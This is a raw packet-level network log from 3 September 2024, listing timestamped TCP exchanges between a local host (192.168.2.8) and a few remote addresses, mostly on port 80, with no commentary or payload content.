Sep 3, 2024 17:13:19.972723007 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972743034 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972877026 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972888947 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972899914 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972908974 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972913027 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972925901 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972937107 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972937107 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972965956 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.973484039 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973495960 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973507881 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973529100 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.973560095 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.973588943 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973601103 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973611116 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973623037 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973628044 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.973651886 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.973674059 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.973742962 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973754883 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973766088 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973777056 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973787069 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973794937 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.973799944 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.973818064 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.973839998 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.974379063 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974392891 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974404097 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974420071 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.974438906 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.974447012 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974459887 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974469900 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974488020 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.974510908 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.974600077 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974612951 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974622011 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974637032 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974651098 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974653959 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.974662066 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974667072 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.974675894 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.974695921 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.974724054 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.976943970 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.976955891 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.976968050 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.976989985 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.976999998 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977011919 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977011919 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.977041006 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.977060080 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.977083921 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977096081 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977132082 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.977286100 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977297068 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977313995 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977324963 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977334976 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977341890 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.977346897 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977361917 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977370024 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.977371931 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977386951 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.977406979 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.977773905 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977786064 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977796078 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977832079 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.977857113 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977869034 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977880001 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977890968 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.977907896 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.977946043 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.978003979 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.978018045 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.978028059 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.978039026 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.978058100 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.978080034 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.978447914 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.978491068 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.978502989 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.978540897 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.978548050 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.978559971 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.978595018 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.002109051 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.004053116 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:20.008891106 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.061141968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061163902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061173916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061227083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.061227083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.061264992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061276913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061286926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061300993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061332941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.061364889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.061429977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061440945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061450958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061464071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061491013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.061506987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.061866045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061909914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061920881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061932087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061942101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.061964989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062007904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062041044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062264919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062274933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062324047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062335014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062335014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062347889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062375069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062381983 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062381983 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062386036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062397957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062408924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062427044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062449932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062526941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062537909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062546968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062560081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062571049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062593937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062593937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062637091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062659979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062745094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062756062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062766075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062777042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062788010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062798977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.062799931 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062840939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.062840939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.063025951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063036919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063047886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063059092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063071012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063082933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063086033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.063097954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063108921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063117027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.063117027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.063138962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.063292027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063304901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063313961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063349009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.063419104 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.063421011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063433886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063442945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063453913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063462973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063474894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063484907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063497066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063498020 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.063509941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063523054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.063535929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.063535929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.063568115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.063568115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064188957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064202070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064210892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064222097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064234018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064245939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064254045 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064254999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064273119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064282894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064285040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064292908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064304113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064311981 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064311981 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064312935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064353943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064378023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064553022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064563990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064574003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064584970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064594984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064604998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064616919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064620972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064621925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064623117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064632893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064650059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064651966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064663887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064675093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064683914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064683914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064687967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064702034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064718008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064719915 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064730883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064742088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064753056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064754009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064754009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064759970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064771891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064784050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064785004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064796925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.064802885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064832926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.064847946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.065433025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065443993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065453053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065463066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065479040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065490961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065499067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065505028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065505028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.065505028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.065517902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065530062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065540075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065550089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065552950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.065552950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.065561056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065572977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065574884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.065584898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065597057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065607071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065617085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.065617085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.065619946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065632105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065644026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065651894 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.065653086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065665960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.065685034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.065685034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.065732956 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.066284895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.066298008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.066308022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.066344976 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.066379070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.072438955 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.072452068 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.072462082 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.072501898 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.072508097 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.072514057 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.072542906 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.072555065 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.126925945 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.126945019 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.126960993 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127002954 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127002954 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127017975 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127027035 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127033949 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127049923 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127060890 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127065897 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127098083 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127113104 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127293110 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127307892 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127321005 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127336025 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127351999 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127376080 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127384901 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127398014 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127413034 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127427101 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127440929 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127454042 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127459049 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127480030 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127496958 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127599955 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127613068 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127628088 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127643108 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127655983 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127659082 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127679110 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127707005 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127835035 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127849102 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127861977 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127875090 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127882957 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127890110 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127903938 CEST	80	49726	185.215.113.17	192.168.2.8
